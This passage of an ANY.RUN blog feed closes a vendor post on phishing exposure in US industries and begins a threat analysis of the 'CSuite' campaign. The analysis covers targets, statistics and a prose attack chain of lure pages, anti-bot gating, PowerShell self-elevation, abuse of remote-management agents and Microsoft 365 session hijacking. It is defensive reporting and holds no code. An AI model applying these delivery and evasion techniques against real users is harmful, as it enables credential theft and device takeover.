<li><strong>Stronger privacy and compliance: keep</strong> sensitive investigations private and support enterprise security requirements. </li>
</ul>



<p class="wp-block-paragraph">These benefits translate into measurable improvements in real SOC workflows. As recently published <a href="https://any.run/cybersecurity-blog/german-manufacturer-success-story/" target="_blank" rel="noreferrer noopener">customer case study</a> proves, ANY.RUN allows security teams to save around <strong>15 minutes per alert response</strong>:</p>



<figure class="wp-block-pullquote"><blockquote><p>“In median, I think we were able to take 15 minutes from every alert response, just by using ANY.RUN, without anything else, without the analysis time and the time it saves us.”</p><cite><strong><strong>Philipp Z., Security Lead at a leading German manufacturer</strong></strong></cite></blockquote></figure>



<h3 class="wp-block-heading">Investigate Beyond a Single Phishing Attempt </h3>



<p class="wp-block-paragraph">A detected attack can also become a starting point for broader threat investigation. </p>



<p class="wp-block-paragraph">With <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries%C2%A0&amp;utm_term=230926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> (TI Lookup), analysts can search threat data by industry, geography, malware, IOCs, techniques, and other parameters to understand whether suspicious activity is part of a wider campaign or relevant to their environment. AI-powered natural-language search makes this threat data easier to explore without constructing complex queries manually.  </p>



<p class="wp-block-paragraph"><strong>TI Lookup query: </strong><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries &amp;utm_term=230926&amp;utm_content=linktotilookupquery#{%22query%22:%22submissionCountry:%5C%22us%5C%22%20AND%20industry:%5C%22Manufacturing%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">submissionCountry:&#8221;us&#8221; AND industry:&#8221;Manufacturing&#8221;</a>  </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="207" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-23-at-13.35.41-1024x207.png" alt="" class="wp-image-23325" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-23-at-13.35.41-1024x207.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-23-at-13.35.41-300x61.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-23-at-13.35.41-768x156.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-23-at-13.35.41-1536x311.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-23-at-13.35.41-2048x415.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-23-at-13.35.41-370x75.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-23-at-13.35.41-270x55.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-23-at-13.35.41-740x150.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>AI search in TI Lookup turns natural language requests into queries that let you explore threat landscape</em> </figcaption></figure>



<p class="wp-block-paragraph">For organizations facing high phishing exposure, <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries%C2%A0&amp;utm_term=230926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a> (TI Feeds) extends this visibility into daily detection and response workflows. Fresh, high-confidence IOCs derived from real-world investigations can be delivered directly into the existing security stack, helping teams detect emerging threats, enrich alerts, and respond without adding more manual work. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="474" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-1024x474.png" alt="" class="wp-image-23155" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-1024x474.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-300x139.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-768x356.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-1536x711.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-2048x949.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-370x171.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-270x125.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/ss02-740x343.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Threat Intelligence Feeds by ANY.RUN deliver 99% unique indicators to security stacks </figcaption></figure>



<p class="wp-block-paragraph">Together, <a href="https://any.run/cybersecurity-blog/enterprise-threat-intelligence-guide/" target="_blank" rel="noreferrer noopener">threat intelligence</a> and <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries%C2%A0&amp;utm_term=230926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">interactive sandboxing</a> help SOC teams investigate threats faster, strengthen detection, reduce manual enrichment, and turn individual phishing incidents into actionable knowledge that protects the wider environment. </p>



<h2 class="wp-block-heading">5 Insights Security Leaders Should Take Away</h2>



<ol class="wp-block-list">
<li><strong>Phishing remains a cross-industry risk. </strong>High exposure across all five industries makes phishing a persistent concern for critical US sectors.</li>



<li><strong>The attack surface extends beyond email. </strong>Files, archives, links, redirects, and browser activity can all form part of the phishing attack chain.</li>



<li><strong>Phishing increasingly targets identity and access.</strong> Credential theft, session compromise, token abuse, and user-driven execution are prominent across leading threats.</li>



<li><strong>The business impact extends beyond the initial compromise.</strong> Successful attacks can expose sensitive data and critical systems, enable unauthorized access, and lead to financial loss or operational disruption.</li>



<li><strong>SOC teams need visibility across the full attack chain. </strong>Behavioral analysis and current threat intelligence help uncover post-click activity, connect related threats, and accelerate detection and response.</li>
</ol>



<h2 class="wp-block-heading">Conclusion </h2>



<p class="wp-block-paragraph">Phishing remains heavily represented across <a href="https://any.run/by-industry/finance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries&amp;utm_term=230926&amp;utm_content=linktofinance" target="_blank" rel="noreferrer noopener">finance</a>, <a href="https://any.run/by-industry/manufacturing/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries%C2%A0&amp;utm_term=230926&amp;utm_content=linktomanufacturing" target="_blank" rel="noreferrer noopener">manufacturing</a>, <a href="https://any.run/by-industry/government/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries&amp;utm_term=230926&amp;utm_content=linktogovernment" target="_blank" rel="noreferrer noopener">government</a>, banking, and <a href="https://any.run/by-industry/technology/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries&amp;utm_term=230926&amp;utm_content=linktotechnology" target="_blank" rel="noreferrer noopener">technology</a>. Credential theft, token compromise, malicious execution, and multi-stage attack chains increasingly blur the line between phishing and identity attacks. </p>



<p class="wp-block-paragraph">Reducing phishing risk therefore means more than stopping suspicious emails. SOC teams need fast behavioral visibility into what those emails, links, and files actually do. </p>



<p class="wp-block-paragraph">With average detection times of 16–17 seconds in banking and technology, <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries%C2%A0&amp;utm_term=230926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s Interactive Sandbox</a> helps teams expose complex attack behavior quickly, while ANY.RUN Threat Intelligence lets them investigate the wider threat context by industry, geography, and related activity. </p>



<h2 class="wp-block-heading">About ANY.RUN </h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries%C2%A0&amp;utm_term=230926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> is a leading provider of interactive malware analysis and threat intelligence solutions trusted by 16,000+ organizations and 700,000+ security professionals worldwide, including 74 of the Fortune 100 companies. </p>



<p class="wp-block-paragraph">Its <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries%C2%A0&amp;utm_term=230926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> and <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-risk-industries%C2%A0&amp;utm_term=230926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a> solutions help SOC teams analyze suspicious files and URLs, uncover malicious behavior, enrich alerts with actionable context, and connect related activity across files, infrastructure, and campaigns. This helps teams investigate threats faster, make more confident response decisions, and contain malicious activity before it creates wider business impact. </p>
<p>The post <a href="https://any.run/cybersecurity-blog/phishing-risk-industries/">Phishing Risk Across 5 Key US Industries: ANY.RUN Data &amp; Mitigation Strategies</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/phishing-risk-industries/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>CSuite Targets US and EU Organizations with Device-Code Phishing and Remote Access</title>
		<link>https://any.run/cybersecurity-blog/csuite-attack-analysis/</link>
					<comments>https://any.run/cybersecurity-blog/csuite-attack-analysis/#respond</comments>
		
		<dc:creator><![CDATA[ShiFu]]></dc:creator>
		<pubDate>Tue, 22 Sep 2026 11:16:00 +0000</pubDate>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=23219</guid>

					<description><![CDATA[<p>ANY.RUN researchers investigated CSuite, a phishing and remote-access operation that combines credential theft, Microsoft 365 session hijacking, and the abuse of legitimate management tools. The campaign showed a strong US focus, with 51% of sessions from the United States. By blending trusted business services with legitimate remote-access software, CSuite can give attackers both account and [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/csuite-attack-analysis/">CSuite Targets US and EU Organizations with Device-Code Phishing and Remote Access</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> researchers investigated <strong>CSuite</strong>, a phishing and remote-access operation that combines credential theft, Microsoft 365 session hijacking, and the abuse of legitimate management tools. The campaign showed a strong US focus, with <strong>51% of sessions from the United States</strong>.</p>



<p class="wp-block-paragraph">By blending trusted business services with legitimate remote-access software, CSuite can give attackers both account and endpoint access while making malicious activity harder to distinguish from normal workflows. </p>



<p class="wp-block-paragraph">Discover how the operation works, which tools and techniques it relies on, and what SOC teams should watch to detect related activity earlier. </p>



<h2 class="wp-block-heading">TL;DR </h2>



<ul class="wp-block-list">
<li><strong>CSuite is a multi-stage phishing and remote-access operation targeting organizations across the US and Europe.</strong> Its campaigns use Adobe, DocuSign, Zoom, SharePoint, Microsoft 365 voicemail, and other trusted business themes to reach victims. </li>



<li><strong>The operation follows two main attack paths.</strong> One delivers legitimate remote-management and endpoint-management tools such as ScreenConnect, Action1, Atera, Syncro, and PDQ Connect. The other steals credentials and Microsoft 365 sessions through phishing and device-code authentication flows. </li>



<li><strong>US organizations make up the largest identified share.</strong> 60% of identified victim organizations were US-based, while 51% of sandbox submissions came from the United States. </li>



<li><strong>CSuite relies heavily on legitimate services and software.</strong> Hijacked Adobe Document Cloud tenants, Cloudflare Workers, public code hosting, and legitimate management tools help the operation blend malicious activity with normal business infrastructure. </li>



<li><strong>The strongest link between the campaigns is shared tooling and infrastructure.</strong> Delivery pages, phishing panels, domains, operator accounts, and exfiltration channels connect the remote-access and credential-theft activity to the same CSuite operation. </li>
</ul>



<h2 class="wp-block-heading">CSuite Threat Overview </h2>



<p class="wp-block-paragraph">CSuite creates risk on both the identity and endpoint sides of the environment. A single campaign can lead to stolen Microsoft 365 access, compromised mailboxes, or direct remote control of employee devices. </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-395"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="8"
           data-wpID="395"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Attribute                      </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Detail                      </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Tracking name                      </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite, after the CSuite v1.1 panel at the centre of the operation                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Structure                      </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Infrastructure supplier with affiliates; the supplier hands out hosting, remote-desktop access and domains in private messaging channels, and each affiliate runs its own exfiltration endpoint                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Motivation                      </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Financial. Credential theft feeding manual mailbox access and business email compromise                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Primary targets                      </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Technology firms, government and administration, consulting, manufacturing, education and mortgage licensees, concentrated in the United States                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Delivery                      </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Adobe-themed download pages, plus DocuSign, Zoom, Google Meet and Dropbox lure lines                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Payloads                      </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Legitimate remote-management and device-management agents deployed as RATs — ScreenConnect, Action1, Atera, Syncro, PDQ Connect renamed to Adobe, Dotloop, DocuSign and others                      </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Observed period                      </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        February 2026 to 3 September 2026; the kit path was still appearing in fresh sandbox analyses on the last day of collection                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-395'>
table#wpdtSimpleTable-395{ table-layout: fixed !important; }
table#wpdtSimpleTable-395 td, table.wpdtSimpleTable395 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">With the following <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> query, we can search through recent public <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">sandbox analyses</a> and identify this malicious activity. </p>



<p class="wp-block-paragraph">TI Lookup: <a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktotilookup#{%22query%22:%22url:%5C%22/m/js/utils.js$%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">url:&#8221;/m/js/utils.js$&#8221;</a> </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="622" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query-1024x622.png" alt="ANY.RUN's Threat Intelligence gives full context into suspicious activity" class="wp-image-23285" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query-1024x622.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query-300x182.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query-768x466.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query-1536x933.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query-370x225.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query-270x164.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query-740x449.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-TI-lookup-query.png 1744w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN&#8217;s Threat Intelligence gives full context into suspicious activity</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Every page in the set uses the same build, with its own reporting endpoint and a byte-identical visitor alert template: <em>New Visitor Alert &#8211; MSI Page</em>. The earliest sample dates to 6 March 2026, and the feeds were still active on 3 September 2026. </p>



<p class="wp-block-paragraph">The two attack arms were linked through an operator mistake. On 7 August 2026, the same sender shared credentials for a hosting control panel and, three hours later, a remote-desktop host used to administer the CSuite v1.1 panel, registrar, and Cloudflare account. Both were sent to the same recipient, tying the delivery and capture infrastructure to the same operation. </p>



<p class="wp-block-paragraph"><strong>Business impact can include:</strong> </p>



<ul class="wp-block-list">
<li><strong>Identity compromise:</strong> Stolen credentials and sessions can give attackers access to Microsoft 365 accounts and mailboxes. </li>



<li><strong>Remote system access:</strong> Legitimate management tools can be abused to gain persistent access to employee devices. </li>



<li><strong>Fraud and impersonation risk:</strong> Compromised mailboxes can support invoice fraud, payment redirection, and follow-on phishing. </li>



<li><strong>Wider operational exposure:</strong> Access to both identities and endpoints can expand the scope of an incident across systems and workflows. </li>



<li><strong>Higher response costs:</strong> Teams may need to contain compromised accounts, revoke sessions, remove remote-access tools, and investigate affected hosts. </li>
</ul>



<p class="wp-block-paragraph"><em>Important note: The research and statistics were based solely on the CSuite administrator panel. Each operator has their own panel.</em> </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Turn Faster Triage Into Lower Risk.
</span> 
<br>
Reduce investigation delays and contain emerging threats sooner.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=csuite-attack-analysis&#038;utm_term=220926&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Strengthen Your SOC</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Where CSuite Hits Hardest: Sectors, Regions, and Compromise Scale </h2>



<p class="wp-block-paragraph">CSuite activity spans multiple industries and regions, but the data shows a clear concentration around US and EU organizations that rely heavily on Microsoft 365, remote administration, and business email workflows. </p>



<p class="wp-block-paragraph">The operation also shows a significant scale across both its delivery and account-compromise arms, with hundreds of related sandbox analyses, captured Microsoft 365 sessions, and thousands of harvested email addresses. </p>



<h2 class="wp-block-heading">Technology, Manufacturing and Government Show the Highest Exposure </h2>



<p class="wp-block-paragraph">CSuite activity spans several industries, with the highest exposure observed among technology, manufacturing, government and administration, and consulting organizations. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="538" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Identified-CSuite-Victim-Organizations-by-Sector-1024x538.png" alt="Identified CSuite Victim Organizations by Sector" class="wp-image-23228" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Identified-CSuite-Victim-Organizations-by-Sector-1024x538.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Identified-CSuite-Victim-Organizations-by-Sector-300x158.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Identified-CSuite-Victim-Organizations-by-Sector-768x403.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Identified-CSuite-Victim-Organizations-by-Sector-1536x806.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Identified-CSuite-Victim-Organizations-by-Sector-2048x1075.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Identified-CSuite-Victim-Organizations-by-Sector-370x194.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Identified-CSuite-Victim-Organizations-by-Sector-270x142.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Identified-CSuite-Victim-Organizations-by-Sector-740x389.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Identified victim organizations by sector</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">These shares overlap because a single analysis can carry more than one industry tag. Still, the pattern shows that CSuite is reaching organizations where access to corporate mailboxes, endpoints, and remote-management infrastructure can create broader operational risk. </p>



<h2 class="wp-block-heading">CSuite Activity Is Concentrated in the US but Extends Globally </h2>



<p class="wp-block-paragraph">The United States accounted for 51% of related <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">sandbox submissions</a>, followed by India at 18%. Activity was also observed in the Philippines, Australia, the United Kingdom, Canada, and 29 other countries. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="768" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-1024x768.png" alt="Sandbox submissions by country" class="wp-image-23229" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-1024x768.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-300x225.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-768x576.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-1536x1152.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-2048x1536.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-370x278.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-270x203.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-740x555.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-80x60.png 80w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN Sandbox submissions by country</em></figcaption></figure>
</div>


<h2 class="wp-block-heading">CSuite Attack Chain </h2>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="649" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-1024x649.png" alt="The attack chain of CSuite campaign" class="wp-image-23223" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-1024x649.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-300x190.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-768x486.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-1536x973.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-2048x1297.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-370x234.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-270x171.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-740x469.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The attack chain of CSuite campaign</em></figcaption></figure>
</div>


<ol start="1" class="wp-block-list">
<li><strong>Lure</strong>: The victim gets a document to review. It arrives as an Adobe Document Cloud share invitation sent from a mailbox the group already controls, or as ordinary mail from one of its two sending relays.  </li>
</ol>



<ol start="2" class="wp-block-list">
<li><strong>Gate</strong>: The first host the victim touches is a redirector. It runs an anti-bot check, then reads the mail domain the victim typed and routes accordingly: Microsoft accounts one way, Google accounts another, everything else to a generic harvester.  </li>
</ol>



<ol start="3" class="wp-block-list">
<li><strong>Landing page</strong>: The victim lands on a counterfeit document viewer — Adobe Reader, DocuSign, Zoom or Dropbox depending on the line. The page reports the visit back to the affiliate, blocks the shortcuts an inquisitive user would reach for, and shows a document that never finishes loading. </li>
</ol>



<ol start="4" class="wp-block-list">
<li><strong>Handover</strong>: The payload reaches the download folder. On the Adobe pages a script click starts it the moment the page opens; on the DocuSign line a button does it, and the server streams the file as an attachment. What arrives is an archive, an installer, or a batch or VBS script a few lines long that fetches the installer once it runs. </li>
</ol>



<ol start="5" class="wp-block-list">
<li><strong>Execution</strong>: The victim opens the file. Instructions on the page frame it as a viewer or an update, and the file asks for elevation. The script droppers self-elevate through PowerShell and then call msiexec on the agent package. </li>
</ol>



<ol start="6" class="wp-block-list">
<li><strong>Host held</strong>: A legitimate management agent lands on the machine — a remote-management client, or in newer builds an endpoint-management agent that enrols the device into a tenant the operator owns. Installation captures the interactive logon, loads into the authentication path at boot, and survives safe mode. </li>
</ol>



<ol start="7" class="wp-block-list">
<li><strong>Account held</strong>: Victims who take the credential branch instead hand over their password and a live session to the panel, which keeps the session alive and hands the operator a mailbox that needs no second factor. </li>
</ol>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Connect every stage of the attack.
</span> 
<br>
Help analysts move from first signal to confident decisions. 
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Strengthen Incident Response</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
